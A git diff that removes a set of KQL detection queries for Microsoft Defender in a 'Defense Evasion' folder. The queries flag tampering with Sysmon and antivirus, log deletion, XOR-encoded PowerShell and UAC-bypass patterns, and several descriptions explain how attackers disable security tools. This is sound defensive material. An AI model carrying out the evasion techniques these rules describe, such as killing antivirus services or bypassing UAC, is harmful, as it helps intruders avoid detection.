--- a/Defense Evasion/Suspicious_WmiPrvSE_Child_Process.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Vadim Khrykov (ThreatIntel), Cyb3rEng, Florian Roth (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects suspicious and uncommon child processes of WmiPrvSE
-// Tags: attack.execution, attack.defense_evasion, attack.t1047, attack.t1204.002, attack.t1218.010
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\wbem\\WmiPrvSE.exe" and ((FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\verclsid.exe" or FolderPath endswith "\\wscript.exe") or ((ProcessCommandLine contains "cscript" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "pwsh" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "wscript") and FolderPath endswith "\\cmd.exe")) and (not(((ProcessCommandLine contains "/i " and FolderPath endswith "\\msiexec.exe") or FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\WmiPrvSE.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Workstation_Locking_via_Rundll32.kql b/Defense Evasion/Suspicious_Workstation_Locking_via_Rundll32.kql
deleted file mode 100644
index 68be0887..00000000
--- a/Defense Evasion/Suspicious_Workstation_Locking_via_Rundll32.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/06/04
-// Level: medium
-// Description: Detects a suspicious call to the user32.dll function that locks the user workstation
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where ProcessCommandLine contains "user32.dll," and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and InitiatingProcessFolderPath endswith "\\cmd.exe" and ProcessCommandLine contains "LockWorkStation"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_X509Enrollment_-_Process_Creation.kql b/Defense Evasion/Suspicious_X509Enrollment_-_Process_Creation.kql
deleted file mode 100644
index 508c2628..00000000
--- a/Defense Evasion/Suspicious_X509Enrollment_-_Process_Creation.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/12/23
-// Level: medium
-// Description: Detect use of X509Enrollment
-// Tags: attack.defense_evasion, attack.t1553.004
-DeviceProcessEvents
-| where ProcessCommandLine contains "X509Enrollment.CBinaryConverter" or ProcessCommandLine contains "884e2002-217d-11da-b2a4-000e7bbb2b09"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_XOR_Encoded_PowerShell_Command.kql b/Defense Evasion/Suspicious_XOR_Encoded_PowerShell_Command.kql
deleted file mode 100644
index f68123c0..00000000
--- a/Defense Evasion/Suspicious_XOR_Encoded_PowerShell_Command.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Sami Ruohonen, Harish Segar, Tim Shelton, Teymur Kheirkhabarov, Vasiliy Burov, oscd.community, Nasreddine Bencherchali
-// Date: 2018/09/05
-// Level: medium
-// Description: Detects presence of a potentially xor encoded powershell command
-// Tags: attack.defense_evasion, attack.execution, attack.t1059.001, attack.t1140, attack.t1027
-DeviceProcessEvents
-| where (ProcessCommandLine contains "ForEach" or ProcessCommandLine contains "for(" or ProcessCommandLine contains "for " or ProcessCommandLine contains "-join " or ProcessCommandLine contains "-join'" or ProcessCommandLine contains "-join\"" or ProcessCommandLine contains "-join`" or ProcessCommandLine contains "::Join" or ProcessCommandLine contains "[char]") and ProcessCommandLine contains "bxor" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or ProcessVersionInfoFileDescription =~ "Windows PowerShell" or ProcessVersionInfoProductName =~ "PowerShell Core 6")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_ZipExec_Execution.kql b/Defense Evasion/Suspicious_ZipExec_Execution.kql
deleted file mode 100644
index 59378b3b..00000000
--- a/Defense Evasion/Suspicious_ZipExec_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/11/07
-// Level: medium
-// Description: ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.
-// Tags: attack.execution, attack.defense_evasion, attack.t1218, attack.t1202
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/generic:Microsoft_Windows_Shell_ZipFolder:filename=" and ProcessCommandLine contains ".zip" and ProcessCommandLine contains "/pass:" and ProcessCommandLine contains "/user:") or (ProcessCommandLine contains "/delete" and ProcessCommandLine contains "Microsoft_Windows_Shell_ZipFolder:filename=" and ProcessCommandLine contains ".zip")
\ No newline at end of file
diff --git a/Defense Evasion/SyncAppvPublishingServer_Execute_Arbitrary_PowerShell_Code.kql b/Defense Evasion/SyncAppvPublishingServer_Execute_Arbitrary_PowerShell_Code.kql
deleted file mode 100644
index b49c1f51..00000000
--- a/Defense Evasion/SyncAppvPublishingServer_Execute_Arbitrary_PowerShell_Code.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/07/12
-// Level: medium
-// Description: Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessCommandLine contains "\"n; " and (FolderPath endswith "\\SyncAppvPublishingServer.exe" or ProcessVersionInfoOriginalFileName =~ "syncappvpublishingserver.exe")
\ No newline at end of file
diff --git a/Defense Evasion/SyncAppvPublishingServer_VBS_Execute_Arbitrary_PowerShell_Code.kql b/Defense Evasion/SyncAppvPublishingServer_VBS_Execute_Arbitrary_PowerShell_Code.kql
deleted file mode 100644
index 2b772b2e..00000000
--- a/Defense Evasion/SyncAppvPublishingServer_VBS_Execute_Arbitrary_PowerShell_Code.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/07/16
-// Level: medium
-// Description: Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs
-// Tags: attack.defense_evasion, attack.t1218, attack.t1216
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\SyncAppvPublishingServer.vbs" and ProcessCommandLine contains ";"
\ No newline at end of file
diff --git a/Defense Evasion/Sysinternals_PsSuspend_Suspicious_Execution.kql b/Defense Evasion/Sysinternals_PsSuspend_Suspicious_Execution.kql
deleted file mode 100644
index 25f9908e..00000000
--- a/Defense Evasion/Sysinternals_PsSuspend_Suspicious_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/03/23
-// Level: high
-// Description: Detects suspicious execution of Sysinternals PsSuspend, where the utility is used to suspend critical processes such as AV or EDR to bypass defenses
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "msmpeng.exe" and (ProcessVersionInfoOriginalFileName =~ "pssuspend.exe" or (FolderPath endswith "\\pssuspend.exe" or FolderPath endswith "\\pssuspend64.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/Sysmon_Configuration_Update.kql b/Defense Evasion/Sysmon_Configuration_Update.kql
deleted file mode 100644
index 1666200e..00000000
--- a/Defense Evasion/Sysmon_Configuration_Update.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/03/09
-// Level: medium
-// Description: Detects updates to Sysmon's configuration. Attackers might update or replace the Sysmon configuration with a bare bone one to avoid monitoring without shutting down the service completely
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-c" or ProcessCommandLine contains "/c") and ((FolderPath endswith "\\Sysmon64.exe" or FolderPath endswith "\\Sysmon.exe") or ProcessVersionInfoFileDescription =~ "System activity monitor")
\ No newline at end of file
diff --git a/Defense Evasion/Sysmon_Driver_Altitude_Change.kql b/Defense Evasion/Sysmon_Driver_Altitude_Change.kql
deleted file mode 100644
index 545223e7..00000000
--- a/Defense Evasion/Sysmon_Driver_Altitude_Change.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: B.Talebi
-// Date: 2022/07/28
-// Level: high
-// Description: Detects changes in Sysmon driver altitude value.
-If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.
-
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where RegistryKey contains "\\Services" and RegistryKey endswith "\\Instances\\Sysmon Instance\\Altitude"
\ No newline at end of file
diff --git a/Defense Evasion/Sysmon_Driver_Unloaded_Via_Fltmc.EXE.kql b/Defense Evasion/Sysmon_Driver_Unloaded_Via_Fltmc.EXE.kql
deleted file mode 100644
index cd96d782..00000000
--- a/Defense Evasion/Sysmon_Driver_Unloaded_Via_Fltmc.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Kirill Kiryanov, oscd.community
-// Date: 2019/10/23
-// Level: high
-// Description: Detects possible Sysmon filter driver unloaded via fltmc.exe
-// Tags: attack.defense_evasion, attack.t1070, attack.t1562, attack.t1562.002
-DeviceProcessEvents
-| where (ProcessCommandLine contains "unload" and ProcessCommandLine contains "sysmon") and (FolderPath endswith "\\fltMC.exe" or ProcessVersionInfoOriginalFileName =~ "fltMC.exe")
\ No newline at end of file
diff --git a/Defense Evasion/System_Control_Panel_Item_Loaded_From_Uncommon_Location.kql b/Defense Evasion/System_Control_Panel_Item_Loaded_From_Uncommon_Location.kql
deleted file mode 100644
index 9eaee852..00000000
--- a/Defense Evasion/System_Control_Panel_Item_Loaded_From_Uncommon_Location.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Anish Bogati
-// Date: 2024/01/09
-// Level: medium
-// Description: Detects image load events of system control panel items (.cpl) from uncommon or non-system locations which might be the result of sideloading.
-// Tags: attack.defense_evasion, attack.t1036
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\hdwwiz.cpl" or FolderPath endswith "\\appwiz.cpl") and (not((FolderPath contains ":\\Windows\\System32\\" or FolderPath contains ":\\Windows\\SysWOW64\\" or FolderPath contains ":\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/Defense Evasion/System_File_Execution_Location_Anomaly.kql b/Defense Evasion/System_File_Execution_Location_Anomaly.kql
deleted file mode 100644
index b5d45fc6..00000000
--- a/Defense Evasion/System_File_Execution_Location_Anomaly.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali
-// Date: 2017/11/27
-// Level: high
-// Description: Detects a Windows program executable started from a suspicious folder
-// Tags: attack.defense_evasion, attack.t1036
-DeviceProcessEvents
-| where (FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\services.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\spoolsv.exe" or FolderPath endswith "\\lsass.exe" or FolderPath endswith "\\smss.exe" or FolderPath endswith "\\csrss.exe" or FolderPath endswith "\\conhost.exe" or FolderPath endswith "\\wininit.exe" or FolderPath endswith "\\lsm.exe" or FolderPath endswith "\\winlogon.exe" or FolderPath endswith "\\explorer.exe" or FolderPath endswith "\\taskhost.exe" or FolderPath endswith "\\Taskmgr.exe" or FolderPath endswith "\\sihost.exe" or FolderPath endswith "\\RuntimeBroker.exe" or FolderPath endswith "\\smartscreen.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\audiodg.exe" or FolderPath endswith "\\wlanext.exe" or FolderPath endswith "\\dashost.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wsl.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\atbroker.exe" or FolderPath endswith "\\bcdedit.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\certreq.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\consent.exe" or FolderPath endswith "\\defrag.exe" or FolderPath endswith "\\dism.exe" or FolderPath endswith "\\dllhst3g.exe" or FolderPath endswith "\\eventvwr.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\runonce.exe" or FolderPath endswith "\\winver.exe" or FolderPath endswith "\\logonui.exe" or FolderPath endswith "\\userinit.exe" or FolderPath endswith "\\dwm.exe" or FolderPath endswith "\\LsaIso.exe" or FolderPath endswith "\\ntoskrnl.exe" or FolderPath endswith "\\wsmprovhost.exe" or FolderPath endswith "\\dfrgui.exe") and (not((((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\") or FolderPath contains "\\SystemRoot\\System32\\" or (FolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Program Files\\PowerShell\\7\\pwsh.exe", "C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe"))) or (FolderPath endswith "\\wsl.exe" and FolderPath startswith "C:\\Program Files\\WindowsApps\\MicrosoftCorporationII.WindowsSubsystemForLinux"))))
\ No newline at end of file
diff --git a/Defense Evasion/Tamper_Windows_Defender_Remove-MpPreference.kql b/Defense Evasion/Tamper_Windows_Defender_Remove-MpPreference.kql
deleted file mode 100644
index a84c588e..00000000
--- a/Defense Evasion/Tamper_Windows_Defender_Remove-MpPreference.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/05
-// Level: high
-// Description: Detects attempts to remove Windows Defender configurations using the 'MpPreference' cmdlet
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "Remove-MpPreference" and (ProcessCommandLine contains "-ControlledFolderAccessProtectedFolders " or ProcessCommandLine contains "-AttackSurfaceReductionRules_Ids " or ProcessCommandLine contains "-AttackSurfaceReductionRules_Actions " or ProcessCommandLine contains "-CheckForSignaturesBeforeRunningScan ")
\ No newline at end of file
diff --git a/Defense Evasion/Tamper_With_Sophos_AV_Registry_Keys.kql b/Defense Evasion/Tamper_With_Sophos_AV_Registry_Keys.kql
deleted file mode 100644
index fcdeaa30..00000000
--- a/Defense Evasion/Tamper_With_Sophos_AV_Registry_Keys.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/02
-// Level: high
-// Description: Detects tamper attempts to sophos av functionality via registry key modification
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey contains "\\Sophos Endpoint Defense\\TamperProtection\\Config\\SAVEnabled" or RegistryKey contains "\\Sophos Endpoint Defense\\TamperProtection\\Config\\SEDEnabled" or RegistryKey contains "\\Sophos\\SAVService\\TamperProtection\\Enabled")
\ No newline at end of file
diff --git a/Defense Evasion/Taskkill_Symantec_Endpoint_Protection.kql b/Defense Evasion/Taskkill_Symantec_Endpoint_Protection.kql
deleted file mode 100644
index f8e74343..00000000
--- a/Defense Evasion/Taskkill_Symantec_Endpoint_Protection.kql	
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Ilya Krestinichev, Florian Roth (Nextron Systems)
-// Date: 2022/09/13
-// Level: high
-// Description: Detects one of the possible scenarios for disabling Symantec Endpoint Protection.
-Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.
-As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.
-
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "taskkill" and ProcessCommandLine contains " /F " and ProcessCommandLine contains " /IM " and ProcessCommandLine contains "ccSvcHst.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Taskmgr_as_LOCAL_SYSTEM.kql b/Defense Evasion/Taskmgr_as_LOCAL_SYSTEM.kql
deleted file mode 100644
index 1c869660..00000000
--- a/Defense Evasion/Taskmgr_as_LOCAL_SYSTEM.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2018/03/18
-// Level: high
-// Description: Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM
-// Tags: attack.defense_evasion, attack.t1036
-DeviceProcessEvents
-| where FolderPath endswith "\\taskmgr.exe" and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")
\ No newline at end of file
diff --git a/Defense Evasion/Tasks_Folder_Evasion.kql b/Defense Evasion/Tasks_Folder_Evasion.kql
deleted file mode 100644
index 057c6541..00000000
--- a/Defense Evasion/Tasks_Folder_Evasion.kql	
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Sreeman
-// Date: 2020/01/13
-// Level: high
-// Description: The Tasks folder in system32 and syswow64 are globally writable paths.
-Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application
-in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr
-
-// Tags: attack.defense_evasion, attack.persistence, attack.execution, attack.t1574.002
-DeviceProcessEvents
-| where (ProcessCommandLine contains "echo " or ProcessCommandLine contains "copy " or ProcessCommandLine contains "type " or ProcessCommandLine contains "file createnew") and (ProcessCommandLine contains " C:\\Windows\\System32\\Tasks\\" or ProcessCommandLine contains " C:\\Windows\\SysWow64\\Tasks\\")
\ No newline at end of file
diff --git a/Defense Evasion/TeamViewer_Log_File_Deleted.kql b/Defense Evasion/TeamViewer_Log_File_Deleted.kql
deleted file mode 100644
index c78998d5..00000000
--- a/Defense Evasion/TeamViewer_Log_File_Deleted.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/16
-// Level: low
-// Description: Detects the deletion of the TeamViewer log files which may indicate an attempt to destroy forensic evidence
-// Tags: attack.defense_evasion, attack.t1070.004
-DeviceFileEvents
-| where (FolderPath contains "\\TeamViewer_" and FolderPath endswith ".log") and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\svchost.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/Terminal_Server_Client_Connection_History_Cleared_-_Registry.kql b/Defense Evasion/Terminal_Server_Client_Connection_History_Cleared_-_Registry.kql
deleted file mode 100644
index 29fb1e22..00000000
--- a/Defense Evasion/Terminal_Server_Client_Connection_History_Cleared_-_Registry.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/10/19
-// Level: high
-// Description: Detects the deletion of registry keys containing the MSTSC connection history
-// Tags: attack.defense_evasion, attack.t1070, attack.t1112
-DeviceRegistryEvents
-| where (ActionType =~ "DeleteValue" and RegistryKey contains "\\Microsoft\\Terminal Server Client\\Default\\MRU") or ((ActionType in~ ("RegistryKeyDeleted", "RegistryValueDeleted")) and RegistryKey contains "\\Microsoft\\Terminal Server Client\\Servers")
\ No newline at end of file
diff --git a/Defense Evasion/Third_Party_Software_DLL_Sideloading.kql b/Defense Evasion/Third_Party_Software_DLL_Sideloading.kql
deleted file mode 100644
index 15cbb1e6..00000000
--- a/Defense Evasion/Third_Party_Software_DLL_Sideloading.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
-// Date: 2022/08/17
-// Level: medium
-// Description: Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\commfunc.dll" and (not((FolderPath contains "\\AppData\\local\\Google\\Chrome\\Application\\" or (FolderPath startswith "C:\\Program Files\\Lenovo\\Communications Utility\\" or FolderPath startswith "C:\\Program Files (x86)\\Lenovo\\Communications Utility\\"))))) or (FolderPath endswith "\\tosbtkbd.dll" and (not((FolderPath startswith "C:\\Program Files\\Toshiba\\Bluetooth Toshiba Stack\\" or FolderPath startswith "C:\\Program Files (x86)\\Toshiba\\Bluetooth Toshiba Stack\\"))))
\ No newline at end of file
diff --git a/Defense Evasion/Time_Travel_Debugging_Utility_Usage.kql b/Defense Evasion/Time_Travel_Debugging_Utility_Usage.kql
deleted file mode 100644
index 676604a5..00000000
--- a/Defense Evasion/Time_Travel_Debugging_Utility_Usage.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Ensar Şamil, @sblmsrsn, @oscd_initiative
-// Date: 2020/10/06
-// Level: high
-// Description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.
-// Tags: attack.defense_evasion, attack.credential_access, attack.t1218, attack.t1003.001
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\tttracer.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Time_Travel_Debugging_Utility_Usage_-_Image.kql b/Defense Evasion/Time_Travel_Debugging_Utility_Usage_-_Image.kql
deleted file mode 100644
index 856e72cb..00000000
--- a/Defense Evasion/Time_Travel_Debugging_Utility_Usage_-_Image.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Ensar Şamil, @sblmsrsn, @oscd_initiative
-// Date: 2020/10/06
-// Level: high
-// Description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.
-// Tags: attack.defense_evasion, attack.credential_access, attack.t1218, attack.t1003.001
-DeviceImageLoadEvents
-| where FolderPath endswith "\\ttdrecord.dll" or FolderPath endswith "\\ttdwriter.dll" or FolderPath endswith "\\ttdloader.dll"
\ No newline at end of file
diff --git a/Defense Evasion/Tomcat_WebServer_Logs_Deleted.kql b/Defense Evasion/Tomcat_WebServer_Logs_Deleted.kql
deleted file mode 100644
index 7d6b9bce..00000000
--- a/Defense Evasion/Tomcat_WebServer_Logs_Deleted.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/16
-// Level: medium
-// Description: Detects the deletion of tomcat WebServer logs which may indicate an attempt to destroy forensic evidence
-// Tags: attack.defense_evasion, attack.t1070
-DeviceFileEvents
-| where (FolderPath contains "catalina." or FolderPath contains "_access_log." or FolderPath contains "localhost.") and (FolderPath contains "\\Tomcat" and FolderPath contains "\\logs\\")
\ No newline at end of file
diff --git a/Defense Evasion/Trust_Access_Disable_For_VBApplications.kql b/Defense Evasion/Trust_Access_Disable_For_VBApplications.kql
deleted file mode 100644
index 5c5f14c7..00000000
--- a/Defense Evasion/Trust_Access_Disable_For_VBApplications.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Trent Liffick (@tliffick), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020/05/22
-// Level: high
-// Description: Detects registry changes to Microsoft Office "AccessVBOM" to a value of "1" which disables trust access for VBA on the victim machine and lets attackers execute malicious macros without any Microsoft Office warnings.
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Security\\AccessVBOM"
\ No newline at end of file
diff --git a/Defense Evasion/TrustedPath_UAC_Bypass_Pattern.kql b/Defense Evasion/TrustedPath_UAC_Bypass_Pattern.kql
deleted file mode 100644
index b8536a1a..00000000
--- a/Defense Evasion/TrustedPath_UAC_Bypass_Pattern.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/08/27
-// Level: critical
-// Description: Detects indicators of a UAC bypass method by mocking directories
-// Tags: attack.defense_evasion, attack.t1548.002
-DeviceProcessEvents
-| where FolderPath contains "C:\\Windows \\System32\\"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_File.kql b/Defense Evasion/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_File.kql
deleted file mode 100644
index 8d57f867..00000000
--- a/Defense Evasion/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_File.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceFileEvents
-| where (FolderPath endswith "\\AppData\\Local\\Temp\\system32\\winsat.exe" or FolderPath endswith "\\AppData\\Local\\Temp\\system32\\winmm.dll") and FolderPath startswith "C:\\Users\\"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_Process.kql b/Defense Evasion/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_Process.kql
deleted file mode 100644
index 503d8c5f..00000000
--- a/Defense Evasion/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_Process.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessCommandLine contains "C:\\Windows \\system32\\winsat.exe" and InitiatingProcessFolderPath endswith "\\AppData\\Local\\Temp\\system32\\winsat.exe"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_Registry.kql b/Defense Evasion/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_Registry.kql
deleted file mode 100644
index 979b06ac..00000000
--- a/Defense Evasion/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_Registry.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceRegistryEvents
-| where RegistryValueData endswith "\\appdata\\local\\temp\\system32\\winsat.exe" and RegistryValueData startswith "c:\\users\\" and RegistryKey contains "\\Root\\InventoryApplicationFile\\winsat.exe|" and RegistryKey endswith "\\LowerCaseLongPath"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Tools_Using_ComputerDefaults.kql b/Defense Evasion/UAC_Bypass_Tools_Using_ComputerDefaults.kql
deleted file mode 100644
index ba29c60d..00000000
--- a/Defense Evasion/UAC_Bypass_Tools_Using_ComputerDefaults.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/31
-// Level: high
-// Description: Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where (FolderPath =~ "C:\\Windows\\System32\\ComputerDefaults.exe" and (ProcessIntegrityLevel in~ ("High", "System"))) and (not((InitiatingProcessFolderPath contains ":\\Windows\\System32" or InitiatingProcessFolderPath contains ":\\Program Files")))
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_.NET_Code_Profiler_on_MMC.kql b/Defense Evasion/UAC_Bypass_Using_.NET_Code_Profiler_on_MMC.kql
deleted file mode 100644
index f8815880..00000000
--- a/Defense Evasion/UAC_Bypass_Using_.NET_Code_Profiler_on_MMC.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceFileEvents
-| where FolderPath endswith "\\AppData\\Local\\Temp\\pe386.dll" and FolderPath startswith "C:\\Users\\"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_ChangePK_and_SLUI.kql b/Defense Evasion/UAC_Bypass_Using_ChangePK_and_SLUI.kql
deleted file mode 100644
index c912f517..00000000
--- a/Defense Evasion/UAC_Bypass_Using_ChangePK_and_SLUI.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where FolderPath endswith "\\changepk.exe" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessFolderPath endswith "\\slui.exe"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_Consent_and_Comctl32_-_File.kql b/Defense Evasion/UAC_Bypass_Using_Consent_and_Comctl32_-_File.kql
deleted file mode 100644
index c45c8dd3..00000000
--- a/Defense Evasion/UAC_Bypass_Using_Consent_and_Comctl32_-_File.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceFileEvents
